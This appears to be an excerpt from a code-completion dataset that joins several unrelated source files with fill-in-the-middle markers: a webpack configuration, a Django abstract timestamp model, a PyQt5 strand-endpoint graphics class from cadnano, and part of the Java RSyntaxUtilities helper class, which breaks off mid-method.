prompt
large_stringlengths 70
991k
| completion
large_stringlengths 0
1.02k
|
---|---|
const path = require('path');
const ExtractTextPlugin = require('extract-text-webpack-plugin');

// Single source of truth for project paths, shared by loader `include` lists.
const PATHS = {
  SRC: path.join(__dirname, 'src')
};

const webpackConfig = {
  entry: ['./src/index.jsx'],
  plugins: [new ExtractTextPlugin('style.css')],
  devtool: 'source-map',
  node: {
    // Stub out Node's `fs` module for the browser bundle (webpack <= 4 syntax).
    fs: 'empty'
  },
  output: {
    path: __dirname,
    publicPath: '/',
    filename: 'bundle.js'
  },
  module: {
    rules: [
      {
        // Lint before transpiling (`enforce: 'pre'`).
        // FIX: was /\.(js|jsx)?$/ — the trailing `?` made the extension group
        // optional, so any file name ending in a bare "." also matched.
        // Use the same /\.jsx?$/ pattern as the babel rule below.
        test: /\.jsx?$/,
        use: [
          {
            loader: 'eslint-loader'
          }
        ],
        include: [PATHS.SRC],
        enforce: 'pre'
      },
      {
        test: /\.jsx?$/,
        // FIX: was `path.resolve('src')`, which resolves against the current
        // working directory; use the shared PATHS.SRC constant (anchored to
        // __dirname) for consistency with the lint rule above.
        include: [PATHS.SRC],
        exclude: /node_modules/,
        use: [
          {
            loader: 'babel-loader',
            options: {
              // Cache transpiled modules for faster rebuilds.
              cacheDirectory: true
            }
          }
        ]
      },
      {
        test: /\.css$/,
        use: ['style-loader', 'css-loader']
      },
      {
        test: /\.(woff|eot|ttf|woff2)$/,
        use: {
          loader: 'url-loader'
        }
      },
      {
        test: /\.(jpg|gif|png|svg)$/,
        use: {
          loader: 'file-loader?name=[name].[hash].[ext]'
        }
      }
    ]
  },
  resolve: {
    // Allow extension-less imports of .js/.jsx files.
    extensions: ['.js', '.jsx']
  },
  devServer: {
    // Serve index.html for unknown routes (client-side routing support).
    historyApiFallback: true,
    contentBase: './'
  }
};

module.exports = webpackConfig;
<|file_name|>models.py<|end_file_name|><|fim▁begin|>from django.contrib.auth.models import User
from django.db import models
from .utils import create_slug
class BaseModel(models.Model):
    """Abstract base model providing self-maintaining timestamp fields.

    Concrete models inheriting from this gain ``created`` and
    ``last_updated`` columns; no table is created for this class itself.
    """

    # Set once, when the row is first inserted.
    created = models.DateTimeField(auto_now_add=True)
    # Refreshed automatically on every save().
    last_updated = models.DateTimeField(auto_now=True)

    class Meta:
        # Fields are inherited by subclasses; no table for BaseModel.
        abstract = True
<|file_name|>endpointitem.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
from math import floor
from typing import (
Tuple,
Any
)
from PyQt5.QtCore import (
QPointF,
QRectF,
Qt
)
from PyQt5.QtGui import (
QBrush,
QPen,
QPainterPath,
QPolygonF,
QMouseEvent,
QPainter
)
from PyQt5.QtWidgets import (
qApp,
QGraphicsItem,
QGraphicsPathItem,
QGraphicsRectItem,
QGraphicsEllipseItem,
QStyleOptionGraphicsItem,
QWidget,
QGraphicsSceneMouseEvent,
QGraphicsSceneHoverEvent
)
from cadnano.gui.palette import getColorObj
from cadnano.views.pathview import pathstyles as styles
from cadnano.views.pathview.tools.pathselection import SelectionItemGroup
from cadnano.views.pathview import (
PathVirtualHelixItemT,
PathXoverItemT,
PathStrandItemT,
PathNucleicAcidPartItemT
)
from cadnano.cntypes import (
StrandT,
DocT,
Vec2T,
WindowT
)
_BASE_WIDTH = styles.PATH_BASE_WIDTH

# Prebuilt, module-level QPainterPaths shared by every EndpointItem instance.
# Each shape is laid out inside a unit cell of _BASE_WIDTH x _BASE_WIDTH px.
PP_L5 = QPainterPath()  # Left 5' PainterPath
PP_R5 = QPainterPath()  # Right 5' PainterPath
PP_L3 = QPainterPath()  # Left 3' PainterPath
PP_R3 = QPainterPath()  # Right 3' PainterPath
PP_53 = QPainterPath()  # Left 5', Right 3' PainterPath
PP_35 = QPainterPath()  # Left 3', Right 5' PainterPath

# set up PP_L5 (left 5' blue square)
PP_L5.addRect(0.25 * _BASE_WIDTH,
              0.125 * _BASE_WIDTH,
              0.75 * _BASE_WIDTH,
              0.75 * _BASE_WIDTH)
# set up PP_R5 (right 5' blue square)
PP_R5.addRect(0, 0.125 * _BASE_WIDTH, 0.75 * _BASE_WIDTH, 0.75 * _BASE_WIDTH)
# set up PP_L3 (left 3' blue triangle)
L3_POLY = QPolygonF()
L3_POLY.append(QPointF(_BASE_WIDTH, 0))
L3_POLY.append(QPointF(0.25 * _BASE_WIDTH, 0.5 * _BASE_WIDTH))
L3_POLY.append(QPointF(_BASE_WIDTH, _BASE_WIDTH))
L3_POLY.append(QPointF(_BASE_WIDTH, 0))  # repeat first point to close the triangle
PP_L3.addPolygon(L3_POLY)
# set up PP_R3 (right 3' blue triangle)
R3_POLY = QPolygonF()
R3_POLY.append(QPointF(0, 0))
R3_POLY.append(QPointF(0.75 * _BASE_WIDTH, 0.5 * _BASE_WIDTH))
R3_POLY.append(QPointF(0, _BASE_WIDTH))
R3_POLY.append(QPointF(0, 0))  # repeat first point to close the triangle
PP_R3.addPolygon(R3_POLY)
# single base left 5'->3' (square on the left, arrowhead on the right)
PP_53.addRect(0, 0.125 * _BASE_WIDTH, 0.5 * _BASE_WIDTH, 0.75 * _BASE_WIDTH)
POLY_53 = QPolygonF()
POLY_53.append(QPointF(0.5 * _BASE_WIDTH, 0))
POLY_53.append(QPointF(_BASE_WIDTH, 0.5 * _BASE_WIDTH))
POLY_53.append(QPointF(0.5 * _BASE_WIDTH, _BASE_WIDTH))
PP_53.addPolygon(POLY_53)
# single base left 3'<-5' (square on the right, arrowhead on the left)
PP_35.addRect(0.50 * _BASE_WIDTH,
              0.125 * _BASE_WIDTH,
              0.5 * _BASE_WIDTH,
              0.75 * _BASE_WIDTH)
POLY_35 = QPolygonF()
POLY_35.append(QPointF(0.5 * _BASE_WIDTH, 0))
POLY_35.append(QPointF(0, 0.5 * _BASE_WIDTH))
POLY_35.append(QPointF(0.5 * _BASE_WIDTH, _BASE_WIDTH))
PP_35.addPolygon(POLY_35)

_DEFAULT_RECT = QRectF(0, 0, _BASE_WIDTH, _BASE_WIDTH)
_NO_PEN = QPen(Qt.NoPen)
# Small circle drawn above an endpoint to mark a modification.
MOD_RECT = QRectF(.25*_BASE_WIDTH, -.25*_BASE_WIDTH, 0.5*_BASE_WIDTH, 0.5*_BASE_WIDTH)
class EndpointItem(QGraphicsPathItem):
    """Draggable cap drawn at one end (or both ends) of a StrandItem in the
    path view.  Renders as a square (5') or a triangle (3') using the
    module-level painter paths, and dispatches mouse/hover events to the
    active tool via ``<prefix>MousePress`` / ``<prefix>MouseMove`` /
    ``<prefix>MouseRelease`` method lookup.

    NOTE(review): indentation in this class was reconstructed from a
    whitespace-mangled source; the nesting inside ``itemChange`` in
    particular should be confirmed against the upstream repository.
    """

    FILTER_NAME = "endpoint"

    def __init__(self, strand_item: PathStrandItemT,
                 cap_type: str,  # low, high, dual
                 is_drawn5to3: bool):
        """The parent should be a StrandItem."""
        super(EndpointItem, self).__init__(strand_item.virtualHelixItem())
        self._strand_item = strand_item
        self._getActiveTool = strand_item._getActiveTool
        self.cap_type = cap_type
        self._low_drag_bound = None   # populated by selectToolMousePress
        self._high_drag_bound = None  # populated by selectToolMousePress
        self._mod_item = None
        self._isdrawn5to3 = is_drawn5to3
        self._initCapSpecificState(is_drawn5to3)
        p = QPen()
        p.setCosmetic(True)
        self.setPen(p)
        # for easier mouseclick
        self._click_area = cA = QGraphicsRectItem(_DEFAULT_RECT, self)
        self._click_area.setAcceptHoverEvents(True)
        # Redirect the click area's events to this item's own handlers.
        cA.hoverMoveEvent = self.hoverMoveEvent
        cA.mousePressEvent = self.mousePressEvent
        cA.mouseMoveEvent = self.mouseMoveEvent
        cA.setPen(_NO_PEN)
        self.setFlag(QGraphicsItem.ItemIsSelectable)
    # end def

    ### SIGNALS ###

    ### SLOTS ###

    ### ACCESSORS ###
    def idx(self) -> int:
        """Look up ``base_idx``, as determined by :class:`StrandItem` idxs
        and cap type."""
        if self.cap_type == 'low':
            return self._strand_item.idxs()[0]
        else:  # high or dual, doesn't matter
            return self._strand_item.idxs()[1]
    # end def

    def partItem(self) -> PathNucleicAcidPartItemT:
        return self._strand_item.partItem()
    # end def

    def disableEvents(self):
        # Revert to the base-class handlers so this item stops reacting.
        self._click_area.setAcceptHoverEvents(False)
        self.mouseMoveEvent = QGraphicsPathItem.mouseMoveEvent
        self.mousePressEvent = QGraphicsPathItem.mousePressEvent
    # end def

    def window(self) -> WindowT:
        return self._strand_item.window()

    ### PUBLIC METHODS FOR DRAWING / LAYOUT ###
    def updatePosIfNecessary(self, idx: int) -> Tuple[bool, SelectionItemGroup]:
        """Update position if necessary and return ``True`` if updated."""
        group = self.group()
        self.tempReparent()
        x = int(idx * _BASE_WIDTH)
        if x != self.x():
            self.setPos(x, self.y())
            # if group:
            #     group.addToGroup(self)
            return True, group
        else:
            # if group:
            #     group.addToGroup(self)
            return False, group

    def safeSetPos(self, x: float, y: float):
        """
        Required to ensure proper reparenting if selected
        """
        group = self.group()
        self.tempReparent()
        self.setPos(x, y)
        if group:
            group.addToGroup(self)
    # end def

    def resetEndPoint(self, is_drawn5to3: bool):
        """Reattach to the virtual helix item and re-pick the cap shape."""
        self.setParentItem(self._strand_item.virtualHelixItem())
        self._initCapSpecificState(is_drawn5to3)
        upperLeftY = 0 if is_drawn5to3 else _BASE_WIDTH
        self.setY(upperLeftY)
    # end def

    def showMod(self, mod_id: str, color: str):
        """Create and show the modification marker circle on this endpoint."""
        self._mod_item = QGraphicsEllipseItem(MOD_RECT, self)
        self.changeMod(mod_id, color)
        self._mod_item.show()
        # print("Showing {}".format(mod_id))
    # end def

    def changeMod(self, mod_id: str, color: str):
        self._mod_id = mod_id
        self._mod_item.setBrush(QBrush(getColorObj(color)))
    # end def

    def destroyMod(self):
        self.scene().removeItem(self._mod_item)
        self._mod_item = None
        self._mod_id = None
    # end def

    def destroyItem(self):
        '''Remove this object and references to it from the view
        '''
        scene = self.scene()
        if self._mod_item is not None:
            self.destroyMod()
        scene.removeItem(self._click_area)
        self._click_area = None
        scene.removeItem(self)
    # end def

    ### PRIVATE SUPPORT METHODS ###
    def _initCapSpecificState(self, is_drawn5to3: bool):
        # Pick the prebuilt module-level painter path matching cap type
        # and drawing direction.
        c_t = self.cap_type
        if c_t == 'low':
            path = PP_L5 if is_drawn5to3 else PP_L3
        elif c_t == 'high':
            path = PP_R3 if is_drawn5to3 else PP_R5
        elif c_t == 'dual':
            path = PP_53 if is_drawn5to3 else PP_35
        self.setPath(path)
    # end def

    ### EVENT HANDLERS ###
    def mousePressEvent(self, event: QGraphicsSceneMouseEvent):
        """Parses a :meth:`mousePressEvent`, calling the appropriate tool
        method as necessary. Stores ``_move_idx`` for future comparison.
        """
        self.scene().views()[0].addToPressList(self)
        idx = self._strand_item.setActiveEndpoint(self.cap_type)
        self._move_idx = idx
        active_tool_str = self._getActiveTool().methodPrefix()
        tool_method_name = active_tool_str + "MousePress"
        if hasattr(self, tool_method_name):  # if the tool method exists
            modifiers = event.modifiers()
            getattr(self, tool_method_name)(modifiers, event, self.idx())

    def hoverLeaveEvent(self, event: QGraphicsSceneHoverEvent):
        self._strand_item.hoverLeaveEvent(event)
    # end def

    def hoverMoveEvent(self, event: QGraphicsSceneHoverEvent):
        """Parses a :meth:`hoverMoveEvent`, calling the appropriate tool
        method as necessary.
        """
        vhi_num = self._strand_item.idNum()
        oligo_length = self._strand_item._model_strand.oligo().length()
        msg = "%d[%d]\tlength: %d" % (vhi_num, self.idx(), oligo_length)
        self.partItem().updateStatusBar(msg)
        active_tool_str = self._getActiveTool().methodPrefix()
        if active_tool_str == 'createTool':
            return self._strand_item.createToolHoverMove(event, self.idx())
        elif active_tool_str == 'addSeqTool':
            return self.addSeqToolHoverMove(event, self.idx())

    def mouseMoveEvent(self, event: QGraphicsSceneMouseEvent):
        """Parses a :meth:`mouseMoveEvent`, calling the appropriate tool
        method as necessary. Updates ``_move_idx`` if it changed.
        """
        tool_method_name = self._getActiveTool().methodPrefix() + "MouseMove"
        if hasattr(self, tool_method_name):  # if the tool method exists
            # Convert the scene x-coordinate back into a base index.
            idx = int(floor((self.x() + event.pos().x()) / _BASE_WIDTH))
            if idx != self._move_idx:  # did we actually move?
                modifiers = event.modifiers()
                self._move_idx = idx
                getattr(self, tool_method_name)(modifiers, idx)

    def customMouseRelease(self, event: QMouseEvent):
        """Parses a :meth:`mouseReleaseEvent` from view, calling the appropriate
        tool method as necessary. Deletes ``_move_idx`` if necessary.
        """
        tool_method_name = self._getActiveTool().methodPrefix() + "MouseRelease"
        if hasattr(self, tool_method_name):  # if the tool method exists
            modifiers = event.modifiers()
            x = event.pos().x()
            getattr(self, tool_method_name)(modifiers, x)  # call tool method
        if hasattr(self, '_move_idx'):
            del self._move_idx

    ### TOOL METHODS ###
    def modsToolMousePress(self, modifiers: Qt.KeyboardModifiers,
                           event: QGraphicsSceneMouseEvent,
                           idx: int):
        """
        Applies the active modification to the clicked strand at ``idx``.
        """
        m_strand = self._strand_item._model_strand
        self._getActiveTool().applyMod(m_strand, idx)
    # end def

    def breakToolMouseRelease(self, modifiers: Qt.KeyboardModifiers,
                              x: float):
        """Shift-click to merge without switching back to select tool."""
        m_strand = self._strand_item._model_strand
        if modifiers & Qt.ShiftModifier:
            m_strand.merge(self.idx())
    # end def

    def eraseToolMousePress(self, modifiers: Qt.KeyboardModifiers,
                            event: QGraphicsSceneMouseEvent,
                            idx: int):
        """Erase the strand."""
        m_strand = self._strand_item._model_strand
        m_strand.strandSet().removeStrand(m_strand)
    # end def

    def insertionToolMousePress(self, modifiers: Qt.KeyboardModifiers,
                                event: QGraphicsSceneMouseEvent,
                                idx: int):
        """Add an insert to the strand if possible."""
        m_strand = self._strand_item._model_strand
        m_strand.addInsertion(idx, 1)
    # end def

    def paintToolMousePress(self, modifiers: Qt.KeyboardModifiers,
                            event: QGraphicsSceneMouseEvent,
                            idx: int):
        """Apply the current palette color to the strand's oligo."""
        m_strand = self._strand_item._model_strand
        if qApp.keyboardModifiers() & Qt.ShiftModifier:
            color = self.window().path_color_panel.shiftColorName()
        else:
            color = self.window().path_color_panel.colorName()
        m_strand.oligo().applyColor(color)
    # end def

    def addSeqToolMousePress(self, modifiers: Qt.KeyboardModifiers,
                             event: QGraphicsSceneMouseEvent,
                             idx: int):
        """Apply the active tool's sequence to this strand's oligo."""
        oligo = self._strand_item._model_strand.oligo()
        add_seq_tool = self._getActiveTool()
        add_seq_tool.applySequence(oligo)
    # end def

    def addSeqToolHoverMove(self, event: QGraphicsSceneHoverEvent,
                            idx: int):
        # m_strand = self._model_strand
        # vhi = self._strand_item._virtual_helix_item
        add_seq_tool = self._getActiveTool()
        add_seq_tool.hoverMove(self, event, flag=self._isdrawn5to3)
    # end def

    def addSeqToolHoverLeave(self, event: QGraphicsSceneHoverEvent):
        self._getActiveTool().hoverLeaveEvent(event)
    # end def

    def createToolHoverMove(self, idx: int):
        """Update the floating crossover preview, if one is active."""
        m_strand = self._strand_item._model_strand
        vhi = self._strand_item._virtual_helix_item
        active_tool = self._getActiveTool()
        if not active_tool.isFloatingXoverBegin():
            temp_xover = active_tool.floatingXover()
            temp_xover.updateFloatingFromStrandItem(vhi, m_strand, idx)
    # end def

    def createToolMousePress(self, modifiers: Qt.KeyboardModifiers,
                             event: QGraphicsSceneMouseEvent,
                             idx: int):
        """Begin or complete a floating crossover at ``idx``."""
        m_strand = self._strand_item._model_strand
        vhi = self._strand_item._virtual_helix_item
        active_tool = self._getActiveTool()
        if active_tool.isFloatingXoverBegin():
            # First click: anchor the floating xover (unless at the 5' end).
            if m_strand.idx5Prime() == idx:
                return
            else:
                temp_xover = active_tool.floatingXover()
                temp_xover.updateBase(vhi, m_strand, idx)
                active_tool.setFloatingXoverBegin(False)
        else:
            # Second click: install the crossover.
            active_tool.setFloatingXoverBegin(True)
            # install Xover
            active_tool.attemptToCreateXover(vhi, m_strand, idx)
    # end def

    def selectToolMousePress(self, modifiers: Qt.KeyboardModifiers,
                             event: QGraphicsSceneMouseEvent,
                             idx: int):
        """Set the allowed drag bounds for use by selectToolMouseMove.
        """
        # print("%s.%s [%d]" % (self, util.methodName(), self.idx()))
        self._low_drag_bound, self._high_drag_bound = self._strand_item._model_strand.getResizeBounds(self.idx())
        s_i = self._strand_item
        viewroot = s_i.viewroot()
        current_filter_set = viewroot.selectionFilterSet()
        if (all(f in current_filter_set for f in s_i.strandFilter()) and self.FILTER_NAME in current_filter_set):
            selection_group = viewroot.strandItemSelectionGroup()
            mod = Qt.MetaModifier
            # Without the Meta modifier, start a fresh selection.
            if not (modifiers & mod):
                selection_group.clearSelection(False)
            selection_group.setSelectionLock(selection_group)
            selection_group.pendToAdd(self)
            selection_group.processPendingToAddList()
            return selection_group.mousePressEvent(event)
    # end def

    def selectToolMouseMove(self, modifiers: Qt.KeyboardModifiers, idx: int):
        """
        Given a new index (pre-validated as different from the prev index),
        calculate the new x coordinate for self, move there, and notify the
        parent strandItem to redraw its horizontal line.
        """
    # end def

    def selectToolMouseRelease(self, modifiers: Qt.KeyboardModifiers, x: float):
        """
        If the positional-calculated idx differs from the model idx, it means
        we have moved and should notify the model to resize.
        If the mouse event had a key modifier, perform special actions:
        shift = attempt to merge with a neighbor
        alt = extend to max drag bound
        """
        m_strand = self._strand_item._model_strand
        if modifiers & Qt.ShiftModifier:
            self.setSelected(False)
            self.restoreParent()
            m_strand.merge(self.idx())
    # end def

    def skipToolMousePress(self, modifiers: Qt.KeyboardModifiers,
                           event: QGraphicsSceneMouseEvent,
                           idx: int):
        """Add a skip (negative-length insert) to the strand if possible."""
        m_strand = self._strand_item._model_strand
        m_strand.addInsertion(idx, -1)
    # end def

    def restoreParent(self, pos: QPointF = None):
        """
        Required to restore parenting and positioning in the partItem
        """
        # map the position
        self.tempReparent(pos=pos)
        self.setSelectedColor(False)
        self.setSelected(False)
    # end def

    def tempReparent(self, pos: QPointF = None):
        """Reparent to the virtual helix item, preserving scene position."""
        vh_item = self._strand_item.virtualHelixItem()
        if pos is None:
            pos = self.scenePos()
        self.setParentItem(vh_item)
        temp_point = vh_item.mapFromScene(pos)
        self.setPos(temp_point)
    # end def

    def setSelectedColor(self, use_default: bool):
        """Set the brush color: the selection highlight, or the oligo color."""
        if use_default == True:
            color = getColorObj(styles.SELECTED_COLOR)
        else:
            oligo = self._strand_item.strand().oligo()
            if oligo.shouldHighlight():
                color = getColorObj(oligo.getColor(), alpha=128)
            else:
                color = getColorObj(oligo.getColor())
        brush = self.brush()
        brush.setColor(color)
        self.setBrush(brush)
    # end def

    def updateHighlight(self, brush: QBrush):
        if not self.isSelected():
            self.setBrush(brush)
    # end def

    def itemChange(self, change: QGraphicsItem.GraphicsItemChange,
                   value: Any) -> bool:
        """Used for selection of the :class:`EndpointItem`

        Args:
            change: parameter that is changing
            value: new value whose type depends on the ``change`` argument

        Returns:
            If the change is a ``QGraphicsItem.ItemSelectedChange``::

                ``True`` if selected, other ``False``

            Otherwise default to :meth:`QGraphicsPathItem.itemChange()` result
        """
        # for selection changes test against QGraphicsItem.ItemSelectedChange
        # intercept the change instead of the has changed to enable features.
        if change == QGraphicsItem.ItemSelectedChange and self.scene():
            active_tool = self._getActiveTool()
            if str(active_tool) == "select_tool":
                s_i = self._strand_item
                viewroot = s_i.viewroot()
                current_filter_set = viewroot.selectionFilterSet()
                selection_group = viewroot.strandItemSelectionGroup()
                # only add if the selection_group is not locked out
                if value == True and self.FILTER_NAME in current_filter_set:
                    if all(f in current_filter_set for f in s_i.strandFilter()):
                        if self.group() != selection_group or not self.isSelected():
                            selection_group.pendToAdd(self)
                            selection_group.setSelectionLock(selection_group)
                            self.setSelectedColor(True)
                        return True
                    else:
                        return False
                    # end if
                elif value == True:
                    # don't select
                    return False
                else:
                    # Deselect
                    # print("deselect ep")
                    # Check if strand is being added to the selection group still
                    if not selection_group.isPending(self._strand_item):
                        selection_group.pendToRemove(self)
                        self.tempReparent()
                        self.setSelectedColor(False)
                        return False
                    else:  # don't deselect, because the strand is still selected
                        return True
                    # end else
                # end if
            elif str(active_tool) == "paint_tool":
                s_i = self._strand_item
                viewroot = s_i.viewroot()
                current_filter_set = viewroot.selectionFilterSet()
                if all(f in current_filter_set for f in s_i.strandFilter()):
                    if not active_tool.isMacrod():
                        active_tool.setMacrod()
                    self.paintToolMousePress(None, None, None)
            # end elif
            return False
        # end if
        return QGraphicsPathItem.itemChange(self, change, value)
    # end def

    def modelDeselect(self, document: DocT):
        """A strand is selected based on whether its low or high endpoints
        are selected. this value is a tuple ``(is_low, is_high)`` of booleans
        """
        strand = self._strand_item.strand()
        test = document.isModelStrandSelected(strand)
        low_val, high_val = document.getSelectedStrandValue(strand) if test else (False, False)
        # Clear only this cap's flag; keep the other end's selection state.
        if self.cap_type == 'low':
            out_value = (False, high_val)
        else:
            out_value = (low_val, False)
        if not out_value[0] and not out_value[1] and test:
            document.removeStrandFromSelection(strand)
        elif out_value[0] or out_value[1]:
            document.addStrandToSelection(strand, out_value)
        self.restoreParent()
    # end def

    def modelSelect(self, document: DocT):
        """A strand is selected based on whether its low or high endpoints
        are selected. this value is a tuple ``(is_low, is_high)`` of booleans
        """
        strand = self._strand_item.strand()
        test = document.isModelStrandSelected(strand)
        low_val, high_val = document.getSelectedStrandValue(strand) if test else (False, False)
        # Set this cap's flag; keep the other end's selection state.
        if self.cap_type == 'low':
            out_value = (True, high_val)
        else:
            out_value = (low_val, True)
        self.setSelected(True)
        self.setSelectedColor(True)
        document.addStrandToSelection(strand, out_value)
    # end def

    def paint(self, painter: QPainter,
              option: QStyleOptionGraphicsItem,
              widget: QWidget):
        painter.setPen(self.pen())
        painter.setBrush(self.brush())
        painter.drawPath(self.path())
    # end def
<|file_name|>RSyntaxUtilities.java<|end_file_name|><|fim▁begin|>/*
* 08/06/2004
*
* RSyntaxUtilities.java - Utility methods used by RSyntaxTextArea and its
* views.
*
* This library is distributed under a modified BSD license. See the included
* RSyntaxTextArea.License.txt file for details.
*/
package com.fr.design.gui.syntax.ui.rsyntaxtextarea;
import java.awt.Color;
import java.awt.Container;
import java.awt.Point;
import java.awt.Rectangle;
import java.awt.Shape;
import java.awt.Toolkit;
import java.util.Map;
import java.util.regex.Pattern;
import java.util.regex.PatternSyntaxException;
import javax.swing.*;
import javax.swing.text.BadLocationException;
import javax.swing.text.Caret;
import javax.swing.text.Document;
import javax.swing.text.Element;
import javax.swing.text.Position;
import javax.swing.text.Segment;
import javax.swing.text.TabExpander;
import javax.swing.text.View;
import com.fr.design.gui.syntax.ui.rsyntaxtextarea.TokenUtils.TokenSubList;
import com.fr.design.gui.syntax.ui.rsyntaxtextarea.folding.FoldManager;
import com.fr.design.gui.syntax.ui.rtextarea.Gutter;
import com.fr.design.gui.syntax.ui.rtextarea.RTextArea;
import com.fr.design.gui.syntax.ui.rtextarea.RTextScrollPane;
/**
* Utility methods used by <code>RSyntaxTextArea</code> and its associated
* classes.
*
* @author Robert Futrell
* @version 0.2
*/
public class RSyntaxUtilities implements SwingConstants {

    /**
     * Integer constant representing a Windows-variant OS.
     */
    public static final int OS_WINDOWS = 1;

    /**
     * Integer constant representing Mac OS X.
     */
    public static final int OS_MAC_OSX = 2;

    /**
     * Integer constant representing Linux.
     */
    public static final int OS_LINUX = 4;

    /**
     * Integer constant representing an "unknown" OS.  99.99% of the
     * time, this means some UNIX variant (AIX, SunOS, etc.).
     */
    public static final int OS_OTHER = 8;

    /**
     * Used for the color of hyperlinks when a LookAndFeel uses light text
     * against a dark background.
     */
    private static final Color LIGHT_HYPERLINK_FG = new Color(0xd8ffff);

    private static final int OS = getOSImpl();

    // Bit flags stored per-character in the dataTable lookup below.
    //private static final int DIGIT_MASK = 1;
    private static final int LETTER_MASK = 2;
    //private static final int WHITESPACE_MASK = 4;
    //private static final int UPPER_CASE_MASK = 8;
    private static final int HEX_CHARACTER_MASK = 16;
    private static final int LETTER_OR_DIGIT_MASK = 32;
    private static final int BRACKET_MASK = 64;
    private static final int JAVA_OPERATOR_MASK = 128;

    /**
     * A lookup table used to quickly decide if a 16-bit Java char is a
     * US-ASCII letter (A-Z or a-z), a digit, a whitespace char (either space
     * (0x0020) or tab (0x0009)), etc.  This method should be faster
     * than <code>Character.isLetter</code>, <code>Character.isDigit</code>,
     * and <code>Character.isWhitespace</code> because we know we are dealing
     * with ASCII chars and so don't have to worry about code planes, etc.
     */
    private static final int[] dataTable = {
        0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, // 0-15
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 16-31
        4, 128, 0, 0, 0, 128, 128, 0, 64, 64, 128, 128, 0, 128, 0, 128, // 32-47
        49, 49, 49, 49, 49, 49, 49, 49, 49, 49, 128, 0, 128, 128, 128, 128, // 48-63
        0, 58, 58, 58, 58, 58, 58, 42, 42, 42, 42, 42, 42, 42, 42, 42, // 64-79
        42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 42, 64, 0, 64, 128, 0, // 80-95
        0, 50, 50, 50, 50, 50, 50, 34, 34, 34, 34, 34, 34, 34, 34, 34, // 96-111
        34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 34, 64, 128, 64, 128, 0, // 112-127
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 128-143
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 144-
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 160-
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 176-
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 192-
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 208-
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, // 224-
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0  // 240-255.
    };

    /**
     * Used in bracket matching methods.
     * NOTE(review): shared mutable static buffer — looks like callers are
     * assumed to be on the EDT only; confirm before using off-thread.
     */
    private static Segment charSegment = new Segment();

    /**
     * Used in token list manipulation methods.
     */
    private static final TokenImpl tempToken = new TokenImpl();

    /**
     * Used internally.
     */
    private static final char[] JS_KEYWORD_RETURN = { 'r', 'e', 't', 'u', 'r', 'n' };

    /**
     * Used internally.  Openers at indices 0-2 pair with closers at
     * indices 3-5 (index + 3): { } , ( ) , [ ].
     */
    private static final String BRACKETS = "{([})]";
/**
 * Returns a string with characters that are special to HTML (such as
 * <code>&lt;</code>, <code>&gt;</code> and <code>&amp;</code>) replaced
 * by their HTML escape sequences.
 *
 * @param s The input string.
 * @param newlineReplacement What to replace newline characters with.
 *        If this is <code>null</code>, they are simply removed.
 * @param inPreBlock Whether this HTML will be in within <code>pre</code>
 *        tags.  If this is <code>true</code>, spaces will be kept as-is;
 *        otherwise, they will be converted to "<code>&amp;nbsp;</code>".
 * @return The escaped version of <code>s</code>, or <code>null</code> if
 *         <code>s</code> was <code>null</code>.
 */
public static final String escapeForHtml(String s,
        String newlineReplacement, boolean inPreBlock) {

    if (s==null) {
        return null;
    }
    if (newlineReplacement==null) {
        newlineReplacement = "";
    }
    // FIX: the replacement strings below had themselves been HTML-unescaped
    // (e.g. the '&' case appended a literal "&", '<' appended "<"), so this
    // method escaped nothing.  Restored the proper entity strings.
    final String tabString = "&nbsp;&nbsp;&nbsp;&nbsp;";
    boolean lastWasSpace = false;

    StringBuilder sb = new StringBuilder();

    for (int i=0; i<s.length(); i++) {
        char ch = s.charAt(i);
        switch (ch) {
            case ' ':
                // In pre blocks whitespace is preserved literally; outside
                // them, runs of spaces collapse, so force a hard space.
                if (inPreBlock || !lastWasSpace) {
                    sb.append(' ');
                }
                else {
                    sb.append("&nbsp;");
                }
                lastWasSpace = true;
                break;
            case '\n':
                sb.append(newlineReplacement);
                lastWasSpace = false;
                break;
            case '&':
                sb.append("&amp;");
                lastWasSpace = false;
                break;
            case '\t':
                sb.append(tabString);
                lastWasSpace = false;
                break;
            case '<':
                sb.append("&lt;");
                lastWasSpace = false;
                break;
            case '>':
                sb.append("&gt;");
                lastWasSpace = false;
                break;
            default:
                sb.append(ch);
                lastWasSpace = false;
                break;
        }
    }

    return sb.toString();
}
/**
 * Returns the rendering hints for text that will most accurately reflect
 * those of the native windowing system.
 *
 * @return The rendering hints, or <code>null</code> if they cannot be
 *         determined.
 */
public static Map<?,?> getDesktopAntiAliasHints() {
    Toolkit toolkit = Toolkit.getDefaultToolkit();
    Object hints = toolkit.getDesktopProperty("awt.font.desktophints");
    return (Map<?,?>)hints;
}
/**
 * Returns the color to use for the line underneath a folded region line.
 *
 * @param textArea The text area.
 * @return The color to use.
 */
public static Color getFoldedLineBottomColor(RSyntaxTextArea textArea) {
    // Prefer the gutter's fold indicator color; fall back to gray when the
    // text area is not inside an RTextScrollPane.
    Gutter gutter = RSyntaxUtilities.getGutter(textArea);
    return (gutter != null) ? gutter.getFoldIndicatorForeground() : Color.gray;
}
/**
 * Returns the gutter component of the scroll pane containing a text
 * area, if any.
 *
 * @param textArea The text area.
 * @return The gutter, or <code>null</code> if the text area is not in
 *         an {@link RTextScrollPane}.
 * @see RTextScrollPane#getGutter()
 */
public static Gutter getGutter(RTextArea textArea) {
    // Expected hierarchy: textArea -> JViewport -> RTextScrollPane.
    Container parent = textArea.getParent();
    if (!(parent instanceof JViewport)) {
        return null;
    }
    Container grandparent = parent.getParent();
    if (grandparent instanceof RTextScrollPane) {
        RTextScrollPane sp = (RTextScrollPane)grandparent;
